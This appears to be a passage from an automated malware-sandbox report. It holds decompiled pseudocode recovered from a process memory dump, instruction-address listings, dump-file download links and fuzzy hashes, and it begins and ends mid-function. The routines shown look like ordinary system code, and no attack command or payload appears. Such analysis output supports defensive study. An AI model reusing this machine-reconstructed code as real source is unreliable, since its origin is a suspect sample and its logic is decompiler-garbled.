											 *((short*)(_t387 + 2)) = 1;
											_t441 = 0x10;
											 *((short*)(_t387 + 6)) = _t441;
											 *((short*)(_t387 + 4)) = 0;
											_t146 = _t387 + 8; // 0x58
											_t455 = _t146;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_t147 = _t414 + 4;
											 *_t147 =  *(_t414 + 4) | 0x00000001;
											__eflags =  *_t147;
											 *(_t479 - 0x24) = 0x68;
											 *(_t479 - 0x30) = _t387;
										}
										__eflags =  *((char*)(_t479 - 0x2a)) - 1;
										if( *((char*)(_t479 - 0x2a)) == 1) {
											_t476 =  *(_t479 - 0x24) + _t414;
											_t455 =  *(_t479 - 0x34);
											 *_t476 = _t455;
											_t379 = 2;
											 *((short*)(_t476 + 2)) = _t379;
											 *((short*)(_t476 + 6)) =  *(_t479 - 0x3c);
											 *((short*)(_t476 + 4)) = 0;
											_t161 = _t476 + 8; // 0x8
											E008F2340(_t161, _t479 - 0x270,  *(_t479 - 0x3c));
											_t480 = _t480 + 0xc;
											 *(_t414 + 4) =  *(_t414 + 4) | 0x00000001;
											 *(_t479 - 0x24) =  *(_t479 - 0x24) + (_t455 & 0x0000ffff);
											_t386 =  *(_t479 - 0x30);
											__eflags = _t386;
											if(_t386 != 0) {
												_t167 = _t386 + 4;
												 *_t167 =  *(_t386 + 4) | 0x00000001;
												__eflags =  *_t167;
											}
											 *(_t479 - 0x30) = _t476;
										}
										__eflags =  *((char*)(_t479 - 0x2b)) - 1;
										if( *((char*)(_t479 - 0x2b)) == 1) {
											_t377 =  *(_t479 - 0x24) + _t414;
											_t430 = 0x10;
											 *_t377 = _t430;
											_t431 = 3;
											 *((short*)(_t377 + 2)) = _t431;
											_t432 = 4;
											 *((short*)(_t377 + 6)) = _t432;
											 *((short*)(_t377 + 4)) = 0;
											 *((intOrPtr*)(_t377 + 8)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
											 *(_t414 + 4) =  *(_t414 + 4) | 0x00000001;
											 *(_t479 - 0x24) =  *(_t479 - 0x24) + 0x10;
											_t437 =  *(_t479 - 0x30);
											__eflags = _t437;
											if(_t437 != 0) {
												_t183 = _t437 + 4;
												 *_t183 =  *(_t437 + 4) | 0x00000001;
												__eflags =  *_t183;
											}
											 *(_t479 - 0x30) = _t377;
										}
										__eflags =  *((char*)(_t479 - 0x29)) - 1;
										if( *((char*)(_t479 - 0x29)) == 1) {
											_t455 = _t414 +  *(_t479 - 0x24);
											_t475 =  *(_t479 - 0x58) & 0x0000ffff;
											E008F2340(_t455,  *(_t479 - 0x48), _t475);
											_t480 = _t480 + 0xc;
											 *(_t414 + 4) =  *(_t414 + 4) | 0x00000001;
											 *(_t479 - 0x24) =  *(_t479 - 0x24) + _t475;
											_t375 =  *(_t479 - 0x30);
											__eflags = _t375;
											if(_t375 != 0) {
												_t196 = _t375 + 4;
												 *_t196 =  *(_t375 + 4) | 0x00000001;
												__eflags =  *_t196;
											}
											 *(_t479 - 0x30) = _t455;
										}
										__eflags =  *(_t479 - 0x54);
										if( *(_t479 - 0x54) != 0) {
											_t474 =  *(_t479 - 0x24) + _t414;
											_t429 =  *(_t479 - 0x60);
											_t361 = _t429 + 0x0000000f & 0x0000fff8;
											 *_t474 = _t361;
											_t452 = 0xc;
											 *((short*)(_t474 + 2)) = _t452;
											 *(_t474 + 6) = _t429;
											_t451 = 0;
											 *((short*)(_t474 + 4)) = 0;
											 *(_t479 - 0x6c) = _t361 - _t429 - 0x00000008 & 0x0000ffff;
											_t208 = _t474 + 8; // 0x8
											_t455 = _t208;
											 *(_t479 - 0x34) = _t429 & 0x0000ffff;
											E008F2340(_t208,  *(_t479 - 0x54), _t429 & 0x0000ffff);
											E008FDFC0( *(_t479 - 0x34) + _t208, 0,  *(_t479 - 0x6c) & 0x0000ffff);
											_t480 = _t480 + 0x18;
											 *(_t414 + 4) =  *(_t414 + 4) | 0x00000001;
											 *(_t479 - 0x24) =  *(_t479 - 0x24) + ( *_t474 & 0x0000ffff);
											_t372 =  *(_t479 - 0x30);
											__eflags = _t372;
											if(_t372 != 0) {
												_t218 = _t372 + 4;
												 *_t218 =  *(_t372 + 4) | 0x00000001;
												__eflags =  *_t218;
											}
											 *(_t479 - 0x30) = _t474;
										}
										__eflags =  *(_t479 - 0x50);
										if( *(_t479 - 0x50) != 0) {
											_t473 =  *(_t479 - 0x24) + _t414;
											_t451 =  *(_t479 - 0x44);
											 *_t473 = _t451 + 0x0000000f & 0x0000fff8;
											_t427 = 0xb;
											_t473[1] = _t427;
											_t473[3] = _t451;
											_t473[2] = 0;
											_t229 =  &(_t473[4]); // 0x8
											_t455 = _t229;
											 *(_t479 - 0x4c) = _t229;
											E008FDFC0((_t451 & 0x0000ffff) + _t229, 0, (_t451 + 0x0000000f & 0x0000fff8) - _t451 - 0x00000008 & 0x0000ffff);
											_t480 = _t480 + 0xc;
											 *(_t414 + 4) =  *(_t414 + 4) | 0x00000001;
											 *(_t479 - 0x24) =  *(_t479 - 0x24) + ( *_t473 & 0x0000ffff);
											_t358 =  *(_t479 - 0x30);
											__eflags = _t358;
											if(_t358 != 0) {
												_t236 = _t358 + 4;
												 *_t236 =  *(_t358 + 4) | 0x00000001;
												__eflags =  *_t236;
											}
										}
										_t329 =  *(_t479 + 0x20);
										__eflags = _t329;
										if(_t329 <= 0) {
											L82:
											 *((intOrPtr*)(_t414 + 0x10)) =  *(_t479 - 0x78);
											 *(_t414 + 0x14) =  *(_t479 - 0x74);
											_t332 =  *(_t479 - 0x28);
											__eflags =  *((intOrPtr*)(_t332 + 0x10)) - 3;
											if( *((intOrPtr*)(_t332 + 0x10)) != 3) {
												asm("rdtsc");
												 *(_t414 + 0x38) = _t332;
												 *(_t414 + 0x3c) = _t451;
											} else {
												 *(_t414 + 0x38) =  *(_t479 - 0x78);
												 *(_t414 + 0x3c) =  *(_t479 - 0x74);
											}
											_t334 =  *[fs:0x18] + 0x20;
											__eflags = _t334;
											 *((intOrPtr*)(_t414 + 8)) =  *((intOrPtr*)(_t334 + 4));
											 *((intOrPtr*)(_t414 + 0xc)) =  *_t334;
											_t463 =  *(_t479 - 0x68);
											goto L86;
										} else {
											_t472 =  *((intOrPtr*)(_t479 + 0x24)) + 0xc;
											__eflags = _t472;
											 *(_t479 - 0x34) = _t329;
											do {
												_t455 =  *(_t472 - 4);
												_t426 =  *((intOrPtr*)(_t472 - 0xc));
												 *(_t479 - 0x6c) =  *(_t472 - 8);
												_t339 =  *((intOrPtr*)(_t479 + 8));
												__eflags =  *(_t339 + 0x3c) & 0x80000000;
												if(( *(_t339 + 0x3c) & 0x80000000) != 0) {
													_t340 =  *_t472;
												} else {
													_t340 = 0;
												}
												_t342 = (_t340 & 0x000000ff) - 1;
												__eflags = _t342;
												if(_t342 == 0) {
													E008F2340( *(_t479 - 0x4c), _t426, _t455);
													_t480 = _t480 + 0xc;
													_t253 = _t479 - 0x4c;
													 *_t253 =  *(_t479 - 0x4c) + _t455;
													__eflags =  *_t253;
												} else {
													__eflags = _t342 != 1;
													if(_t342 != 1) {
														 *(_t479 - 0x24) =  *(_t479 - 0x24) + _t455;
														E008F2340( *(_t479 - 0x24) + _t414, _t426, _t455);
														_t480 = _t480 + 0xc;
													}
												}
												_t472 = _t472 + 0x10;
												_t255 = _t479 - 0x34;
												 *_t255 =  *(_t479 - 0x34) - 1;
												__eflags =  *_t255;
											} while ( *_t255 != 0);
											goto L82;
										}
									}
								} else {
									_t451 =  *( *((intOrPtr*)(_t479 + 8)) + 0x3c) >> 0x1f;
									_t393 =  *((intOrPtr*)(_t479 + 0x24)) + 8;
									__eflags = _t393;
									while(1) {
										_t455 =  *(_t479 - 0x20);
										__eflags = _t451;
										if(_t451 != 0) {
											_t443 =  *((intOrPtr*)(_t393 + 4));
										} else {
											_t443 = 0;
										}
										_t445 = (_t443 & 0x000000ff) - 1;
										__eflags = _t445;
										if(_t445 == 0) {
											_t421 =  *_t393;
											 *(_t479 - 0x44) =  *(_t479 - 0x44) +  *_t393;
											_t101 = _t479 - 0x50;
											 *_t101 =  *(_t479 - 0x50) + 1;
											__eflags =  *_t101;
										} else {
											__eflags = _t445 == 1;
											if(_t445 == 1) {
												 *(_t479 - 0x54) =  *(_t393 - 8);
												_t448 =  *_t393 & 0x0000ffff;
												 *(_t479 - 0x60) = _t448;
												_t421 = (_t448 & 0x0000ffff) + 0x0000000f & 0xfffffff8;
												__eflags = _t421;
											} else {
												_t421 =  *_t393;
											}
											 *(_t479 - 0x20) =  *(_t479 - 0x20) + _t421;
										}
										__eflags =  *(_t479 - 0x20) - _t455;
										if( *(_t479 - 0x20) < _t455) {
											break;
										}
										 *(_t479 - 0x28) =  *(_t479 - 0x28) + 1;
										_t393 = _t393 + 0x10;
										_t421 =  *(_t479 - 0x28);
										__eflags = _t421 -  *(_t479 + 0x20);
										if(_t421 >=  *(_t479 + 0x20)) {
											goto L43;
										}
									}
									 *(_t479 - 0x40) = 0x216;
									goto L43;
								}
							}
							__eflags = _t417 | _t451;
							if((_t417 | _t451) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t414;
						if(_t414 != 0) {
							goto L86;
						}
						goto L10;
						L86:
						 *(_t479 - 0x38) =  *(_t479 - 0x38) + 1;
						_t463 =  &(_t463[0xc]);
						 *(_t479 - 0x68) = _t463;
						__eflags =  *(_t479 - 0x38) - 4;
						if( *(_t479 - 0x38) >= 4) {
							goto L93;
						}
						_t455 = 0;
						__eflags = 0;
					}
				} else {
					_push(0x57);
					L94:
					return E008FE228(_t414, _t455, _t463);
				}
			}



















































                                                0x009acba4
                                                0x009acba4
                                                0x009acba9
                                                0x009acbae
                                                0x009acbb3
                                                0x009acbb5
                                                0x009acbb8
                                                0x009acbbb
                                                0x009acbbe
                                                0x009acbc1
                                                0x009acbc7
                                                0x009acbd1
                                                0x009acbe7
                                                0x009acbe9
                                                0x009acbeb
                                                0x009acbf0
                                                0x009acbf5
                                                0x009acbf7
                                                0x009acbf9
                                                0x009acc01
                                                0x009acc06
                                                0x009acc0b
                                                0x009acc0e
                                                0x009acc1d
                                                0x009acc1d
                                                0x009acbf7
                                                0x009acc4d
                                                0x009acc53
                                                0x009acc56
                                                0x009acc5d
                                                0x009acc5d
                                                0x009acc60
                                                0x009acc63
                                                0x009acc68
                                                0x009acc69
                                                0x009acc6c
                                                0x009acc6f
                                                0x009acc73
                                                0x009acc77
                                                0x009acc7b
                                                0x009acc7e
                                                0x009acc81
                                                0x009acc84
                                                0x009acc87
                                                0x009acc8a
                                                0x009acc8d
                                                0x009acc90
                                                0x009acc94
                                                0x00000000
                                                0x00000000
                                                0x009acc9a
                                                0x009acc9d
                                                0x009acca0
                                                0x009accaa
                                                0x009accac
                                                0x009accaf
                                                0x009accb1
                                                0x009accb9
                                                0x009accc1
                                                0x009accc3
                                                0x009accc5
                                                0x00000000
                                                0x00000000
                                                0x009acccb
                                                0x009accd5
                                                0x009accd7
                                                0x009accd9
                                                0x00000000
                                                0x00000000
                                                0x009accdf
                                                0x009acce2
                                                0x00000000
                                                0x00000000
                                                0x009acce8
                                                0x009accee
                                                0x009accf9
                                                0x009accfa
                                                0x009accfe
                                                0x009acd02
                                                0x009acd04
                                                0x009acd04
                                                0x009acd0b
                                                0x009acd0e
                                                0x009acd13
                                                0x009acd14
                                                0x009acd16
                                                0x009acd1b
                                                0x009acd1e
                                                0x009acd23
                                                0x009acd26
                                                0x009acd2b
                                                0x009acd30
                                                0x009acd31
                                                0x009acd39
                                                0x009acd39
                                                0x009acd3c
                                                0x009acd40
                                                0x009acd5c
                                                0x009acd62
                                                0x009acd67
                                                0x009acd71
                                                0x009acd77
                                                0x009acd7a
                                                0x009acd7e
                                                0x009acd80
                                                0x009acd87
                                                0x009acd87
                                                0x009acd87
                                                0x009acd87
                                                0x009acd7e
                                                0x009acd40
                                                0x009acd8a
                                                0x009acd8e
                                                0x009acd91
                                                0x009acd93
                                                0x009acd95
                                                0x009acd99
                                                0x009acd9b
                                                0x009acda3
                                                0x009acda3
                                                0x009acda3
                                                0x009acda3
                                                0x009acd99
                                                0x009acda8
                                                0x009acdaa
                                                0x009acdac
                                                0x009acdae
                                                0x009acdb2
                                                0x009acdb2
                                                0x009acdb2
                                                0x009acdb2
                                                0x009acdbf
                                                0x009acdc1
                                                0x009acdc5
                                                0x009acdc9
                                                0x009ace35
                                                0x009ace35
                                                0x009ace39
                                                0x009ace45
                                                0x009ace45
                                                0x009ace45
                                                0x009ace45
                                                0x009ace48
                                                0x009ace4c
                                                0x009ad1e8
                                                0x009ad1f5
                                                0x009ad1f9
                                                0x00000000
                                                0x009ace52
                                                0x009ace55
                                                0x009ace5b
                                                0x009ace61
                                                0x009ace64
                                                0x009ace66
                                                0x009ad1e1
                                                0x009ad1e1
                                                0x00000000
                                                0x009ad1e1
                                                0x009ace6c
                                                0x009ace72
                                                0x00000000
                                                0x00000000
                                                0x009ace82
                                                0x009ace97
                                                0x009ace99
                                                0x009ace9b
                                                0x009ad1b4
                                                0x009ad1b7
                                                0x009ad1bc
                                                0x009ad1cd
                                                0x009ad1d0
                                                0x009ad1d2
                                                0x009ad1dc
                                                0x009ad1be
                                                0x009ad1be
                                                0x009ad1be
                                                0x00000000
                                                0x009ad1bc
                                                0x009acea3
                                                0x009acea5
                                                0x009aceab
                                                0x009aceb1
                                                0x009aceb8
                                                0x009acec0
                                                0x009acec8
                                                0x009aced0
                                                0x009aceda
                                                0x009acedb
                                                0x009acedc
                                                0x009acedd
                                                0x009acee4
                                                0x009acee5
                                                0x009acee6
                                                0x009acee7
                                                0x009aceeb
                                                0x009aceeb
                                                0x009aceee
                                                0x009acef0
                                                0x009acef9
                                                0x009acef9
                                                0x009aceff
                                                0x009acf00
                                                0x009acf01
                                                0x009acf02
                                                0x009acf06
                                                0x009acf08
                                                0x009acf0a
                                                0x009acf0a
                                                0x009acf0f
                                                0x009acf10
                                                0x009acf16
                                                0x009acf1c
                                                0x009acf1d
                                                0x009acf23
                                                0x009acf27
                                                0x009acf27
                                                0x009acf2a
                                                0x009acf2b
                                                0x009acf2c
                                                0x009acf2d
                                                0x009acf2e
                                                0x009acf2e
                                                0x009acf2e
                                                0x009acf33
                                                0x009acf3a
                                                0x009acf3a
                                                0x009acf3d
                                                0x009acf41
                                                0x009acf46
                                                0x009acf49
                                                0x009acf4c
                                                0x009acf51
                                                0x009acf52
                                                0x009acf5a
                                                0x009acf60
                                                0x009acf6e
                                                0x009acf72
                                                0x009acf77
                                                0x009acf7a
                                                0x009acf82
                                                0x009acf85
                                                0x009acf88
                                                0x009acf8a
                                                0x009acf8c
                                                0x009acf8c
                                                0x009acf8c
                                                0x009acf8c
                                                0x009acf91
                                                0x009acf91
                                                0x009acf94
                                                0x009acf98
                                                0x009acf9d
                                                0x009acfa1
                                                0x009acfa2
                                                0x009acfa7
                                                0x009acfa8
                                                0x009acfae
                                                0x009acfaf
                                                0x009acfb5
                                                0x009acfc9
                                                0x009acfcc
                                                0x009acfd1
                                                0x009acfd5
                                                0x009acfd8
                                                0x009acfda
                                                0x009acfdc
                                                0x009acfdc
                                                0x009acfdc
                                                0x009acfdc
                                                0x009acfe1
                                                0x009acfe1
                                                0x009acfe4
                                                0x009acfe8
                                                0x009acfed
                                                0x009acff0
                                                0x009acff9
                                                0x009acffe
                                                0x009ad001
                                                0x009ad006
                                                0x009ad009
                                                0x009ad00c
                                                0x009ad00e
                                                0x009ad010
                                                0x009ad010
                                                0x009ad010
                                                0x009ad010
                                                0x009ad015
                                                0x009ad015
                                                0x009ad018
                                                0x009ad01c
                                                0x009ad021
                                                0x009ad024
                                                0x009ad02a
                                                0x009ad02f
                                                0x009ad034
                                                0x009ad035
                                                0x009ad039
                                                0x009ad03d
                                                0x009ad03f
                                                0x009ad04b
                                                0x009ad04e
                                                0x009ad04e
                                                0x009ad054
                                                0x009ad05c
                                                0x009ad06e
                                                0x009ad073
                                                0x009ad076
                                                0x009ad07e
                                                0x009ad081
                                                0x009ad084
                                                0x009ad086
                                                0x009ad088
                                                0x009ad088
                                                0x009ad088
                                                0x009ad088
                                                0x009ad08d
                                                0x009ad08d
                                                0x009ad090
                                                0x009ad094
                                                0x009ad099
                                                0x009ad09c
                                                0x009ad0a7
                                                0x009ad0ac
                                                0x009ad0ad
                                                0x009ad0b4
                                                0x009ad0ba
                                                0x009ad0be
                                                0x009ad0be
                                                0x009ad0c1
                                                0x009ad0d5
                                                0x009ad0da
                                                0x009ad0dd
                                                0x009ad0e5
                                                0x009ad0e8
                                                0x009ad0eb
                                                0x009ad0ed
                                                0x009ad0ef
                                                0x009ad0ef
                                                0x009ad0ef
                                                0x009ad0ef
                                                0x009ad0ed
                                                0x009ad0f4
                                                0x009ad0f7
                                                0x009ad0f9
                                                0x009ad158
                                                0x009ad15b
                                                0x009ad161
                                                0x009ad164
                                                0x009ad167
                                                0x009ad16b
                                                0x009ad17b
                                                0x009ad17d
                                                0x009ad180
                                                0x009ad16d
                                                0x009ad170
                                                0x009ad176
                                                0x009ad176
                                                0x009ad189
                                                0x009ad189
                                                0x009ad18f
                                                0x009ad194
                                                0x009ad197
                                                0x00000000
                                                0x009ad0fb
                                                0x009ad0fe
                                                0x009ad0fe
                                                0x009ad101
                                                0x009ad104
                                                0x009ad104
                                                0x009ad107
                                                0x009ad10d
                                                0x009ad110
                                                0x009ad113
                                                0x009ad11a
                                                0x009ad120
                                                0x009ad11c
                                                0x009ad11c
                                                0x009ad11c
                                                0x009ad125
                                                0x009ad125
                                                0x009ad126
                                                0x009ad145
                                                0x009ad14a
                                                0x009ad14d
                                                0x009ad14d
                                                0x009ad14d
                                                0x009ad128
                                                0x009ad128
                                                0x009ad129
                                                0x009ad130
                                                0x009ad136
                                                0x009ad13b
                                                0x009ad13b
                                                0x009ad129
                                                0x009ad150
                                                0x009ad153
                                                0x009ad153
                                                0x009ad153
                                                0x009ad153
                                                0x00000000
                                                0x009ad104
                                                0x009ad0f9
                                                0x009acdcb
                                                0x009acdd1
                                                0x009acdd7
                                                0x009acdd7
                                                0x009acdda
                                                0x009acdda
                                                0x009acddd
                                                0x009acddf
                                                0x009acde5
                                                0x009acde1
                                                0x009acde1
                                                0x009acde1
                                                0x009acdeb
                                                0x009acdeb
                                                0x009acdec
                                                0x009ace0f
                                                0x009ace12
                                                0x009ace16
                                                0x009ace16
                                                0x009ace16
                                                0x009acdee
                                                0x009acdee
                                                0x009acdef
                                                0x009acdf8
                                                0x009acdfb
                                                0x009acdfe
                                                0x009ace07
                                                0x009ace07
                                                0x009acdf1
                                                0x009acdf1
                                                0x009acdf1
                                                0x009ace0a
                                                0x009ace0a
                                                0x009ace19
                                                0x009ace1c
                                                0x00000000
                                                0x00000000
                                                0x009ace1e
                                                0x009ace21
                                                0x009ace24
                                                0x009ace27
                                                0x009ace2a
                                                0x00000000
                                                0x00000000
                                                0x009ace2c
                                                0x009ace2e
                                                0x00000000
                                                0x009ace2e
                                                0x009acdc9
                                                0x009accb5
                                                0x009accb7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009accb7
                                                0x009acca2
                                                0x009acca4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009ad19a
                                                0x009ad19a
                                                0x009ad19d
                                                0x009ad1a0
                                                0x009ad1a3
                                                0x009ad1a7
                                                0x00000000
                                                0x00000000
                                                0x009acc5b
                                                0x009acc5b
                                                0x009acc5b
                                                0x009acbd3
                                                0x009acbd3
                                                0x009ad1fc
                                                0x009ad207
                                                0x009ad207

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cce57b96b995d2c291b78912cff0ef6efc09b9f27a94131fdbe2e08ce6594307
                                                • Instruction ID: a5662264aca0892a313f3a69b04c25593b46aa949b856ffe6531a77eebfe5050
                                                • Opcode Fuzzy Hash: cce57b96b995d2c291b78912cff0ef6efc09b9f27a94131fdbe2e08ce6594307
                                                • Instruction Fuzzy Hash: 25227BB1D00218CFDB14CF98C884AEDBBF4FF4A314F15856AE849AF291D375A985CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00902305, Relevance: .5, Instructions: 528COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00902305(signed int _a4, signed int _a8, signed int _a12) {
				void* __ebx;
				signed int __esi;
				signed int _t984;
				void* _t986;
				void* _t987;
				signed char* _t1118;
				signed char* _t1119;
				void* _t1124;
				signed int _t1204;
				void* _t1206;
				void* _t1249;
				void* _t1251;
				void* _t1253;
				void* _t1256;
				void* _t1258;
				void* _t1260;
				void* _t1263;
				void* _t1265;
				void* _t1267;
				void* _t1270;
				void* _t1272;
				void* _t1274;
				void* _t1277;
				void* _t1279;
				void* _t1281;
				void* _t1284;
				void* _t1286;
				void* _t1288;
				void* _t1291;
				void* _t1293;
				void* _t1295;
				void* _t1298;
				void* _t1300;
				void* _t1302;

				_t1204 = _a12;
				_t984 = _t1204;
				if(_t984 == 0) {
					return 0;
				} else {
					__eax = __eax - 1;
					if(__eax == 0) {
						__eax = _a4;
						__ecx = _a8;
						__eax =  *_a4 & 0x000000ff;
						__ecx =  *_a8 & 0x000000ff;
						L389:
						__eax = __eax - __ecx;
						if(__eax == 0) {
							L413:
							return __eax;
						}
						0 = 0 | __eax > 0x00000000;
						__ecx = (__eax > 0) + (__eax > 0) - 1;
						__eax = __ecx;
						return __ecx;
					}
					__eax = __eax - 1;
					if(__eax == 0) {
						__ecx = _a4;
						__esi = _a8;
						__eax =  *__ecx & 0x000000ff;
						__eax = ( *__ecx & 0x000000ff) - ( *__esi & 0x000000ff);
						if(__eax == 0) {
							L398:
							__eax =  *(__ecx + 1) & 0x000000ff;
							__ecx =  *(__esi + 1) & 0x000000ff;
							goto L389;
						}
						0 = 0 | __eax > 0x00000000;
						__eax = (__eax > 0) + (__eax > 0) - 1;
						if(__eax != 0) {
							goto L413;
						}
						goto L398;
					}
					__eax = __eax - 1;
					if(__eax == 0) {
						__ecx = _a4;
						__esi = _a8;
						__eax =  *__ecx & 0x000000ff;
						__eax = ( *__ecx & 0x000000ff) - ( *__esi & 0x000000ff);
						if(__eax == 0) {
							L393:
							__eax =  *(__ecx + 1) & 0x000000ff;
							__eax = ( *(__ecx + 1) & 0x000000ff) - ( *(__esi + 1) & 0x000000ff);
							if(__eax == 0) {
								L395:
								__eax =  *(__ecx + 2) & 0x000000ff;
								__ecx =  *(__esi + 2) & 0x000000ff;
								goto L389;
							}
							0 = 0 | __eax > 0x00000000;
							__eax = (__eax > 0) + (__eax > 0) - 1;
							if(__eax != 0) {
								goto L413;
							}
							goto L395;
						}
						0 = 0 | __eax > 0x00000000;
						__eax = (__eax > 0) + (__eax > 0) - 1;
						if(__eax != 0) {
							goto L413;
						}
						goto L393;
					}
					if(__eax == 0) {
						__ecx = _a4;
						__esi = _a8;
						__eax =  *__ecx & 0x000000ff;
						__eax = ( *__ecx & 0x000000ff) - ( *__esi & 0x000000ff);
						if(__eax == 0) {
							L384:
							__eax =  *(__ecx + 1) & 0x000000ff;
							__eax = ( *(__ecx + 1) & 0x000000ff) - ( *(__esi + 1) & 0x000000ff);
							if(__eax == 0) {
								L386:
								__eax =  *(__ecx + 2) & 0x000000ff;
								__eax = ( *(__ecx + 2) & 0x000000ff) - ( *(__esi + 2) & 0x000000ff);
								if(__eax == 0) {
									L388:
									__eax =  *(__ecx + 3) & 0x000000ff;
									__ecx =  *(__esi + 3) & 0x000000ff;
									goto L389;
								}
								0 = 0 | __eax > 0x00000000;
								__eax = (__eax > 0) + (__eax > 0) - 1;
								if(__eax != 0) {
									goto L413;
								}
								goto L388;
							}
							0 = 0 | __eax > 0x00000000;
							__eax = (__eax > 0) + (__eax > 0) - 1;
							if(__eax != 0) {
								goto L413;
							}
							goto L386;
						}
						0 = 0 | __eax > 0x00000000;
						__eax = (__eax > 0) + (__eax > 0) - 1;
						if(__eax != 0) {
							goto L413;
						}
						goto L384;
					}
					__ecx = _a8;
					__eax = _a4;
					L405:
					while(_t1204 >= _t1124) {
						goto L1;
					}
					_t987 = _t984 + _t1204;
					_t1119 =  &(_t1118[_t1204]);
					if(_t1204 > 0x1f) {
						L446:
						_t986 = 0;
						L412:
						return _t986;
					}
					switch( *((intOrPtr*)(_t1204 * 4 +  &M00902280))) {
						case 0:
							goto L446;
						case 1:
							L219:
							__ecx =  *(__ecx - 1) & 0x000000ff;
							__eax =  *(__eax - 1) & 0x000000ff;
							__eax = __eax - __ecx;
							if(__eax != 0) {
								0 = 0 | __eax > 0x00000000;
								__ecx = (__eax > 0) + (__eax > 0) - 1;
								__eax = (__eax > 0) + (__eax > 0) - 1;
							}
							goto L412;
						case 2:
							L298:
							if( *(__eax - 2) ==  *(__ecx - 2)) {
								goto L446;
							}
							goto L299;
						case 3:
							L379:
							__esi =  *(__eax - 3) & 0x000000ff;
							__edx =  *(__ecx - 3) & 0x000000ff;
							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
							if(__esi == 0) {
								L299:
								__edx =  *(__ecx - 2) & 0x000000ff;
								__esi =  *(__eax - 2) & 0x000000ff;
								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
								if(__esi == 0) {
									goto L219;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx == 0) {
									goto L219;
								}
								L381:
								__eax = __edx;
								goto L412;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx == 0) {
								goto L299;
							}
							goto L381;
						case 4:
							L443:
							_t1143 =  *(_t987 - 4);
							if(_t1143 !=  *(_t1119 - 4)) {
								_t1229 = (_t1143 & 0x000000ff) - ( *(_t1119 - 4) & 0x000000ff);
								if(_t1229 == 0) {
									L135:
									_t1231 = ( *(_t987 - 3) & 0x000000ff) - ( *(_t1119 - 3) & 0x000000ff);
									if(_t1231 == 0) {
										L137:
										_t1233 = ( *(_t987 - 2) & 0x000000ff) - ( *(_t1119 - 2) & 0x000000ff);
										if(_t1233 == 0) {
											L140:
											_t986 = ( *(_t987 - 1) & 0x000000ff) - ( *(_t1119 - 1) & 0x000000ff);
											if(_t986 != 0) {
												_t986 = (0 | _t986 > 0x00000000) + (0 | _t986 > 0x00000000) - 1;
											}
											L445:
											if(_t986 != 0) {
												goto L412;
											}
											goto L446;
										}
										_t1149 = (0 | _t1233 > 0x00000000) + (0 | _t1233 > 0x00000000) - 1;
										if(_t1149 == 0) {
											goto L140;
										}
										L139:
										_t986 = _t1149;
										goto L445;
									}
									_t1149 = (0 | _t1231 > 0x00000000) + (0 | _t1231 > 0x00000000) - 1;
									if(_t1149 != 0) {
										goto L139;
									}
									goto L137;
								}
								_t1149 = (0 | _t1229 > 0x00000000) + (0 | _t1229 > 0x00000000) - 1;
								if(_t1149 != 0) {
									goto L139;
								}
								goto L135;
							}
							_t986 = 0;
							goto L445;
						case 5:
							L208:
							__edx =  *(__eax - 5);
							if( *(__eax - 5) ==  *(__ecx - 5)) {
								__esi = 0;
								L218:
								if(__esi != 0) {
									goto L411;
								}
								goto L219;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 5) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
							if(__esi == 0) {
								L211:
								__esi =  *(__eax - 4) & 0x000000ff;
								__edx =  *(__ecx - 4) & 0x000000ff;
								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
								if(__esi == 0) {
									L213:
									__esi =  *(__eax - 3) & 0x000000ff;
									__edx =  *(__ecx - 3) & 0x000000ff;
									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
									if(__esi == 0) {
										L215:
										__esi =  *(__eax - 2) & 0x000000ff;
										__edx =  *(__ecx - 2) & 0x000000ff;
										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L218;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L215;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L213;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L211;
						case 6:
							L287:
							__edx =  *(__eax - 6);
							if( *(__eax - 6) ==  *(__ecx - 6)) {
								__esi = 0;
								L297:
								if(__esi != 0) {
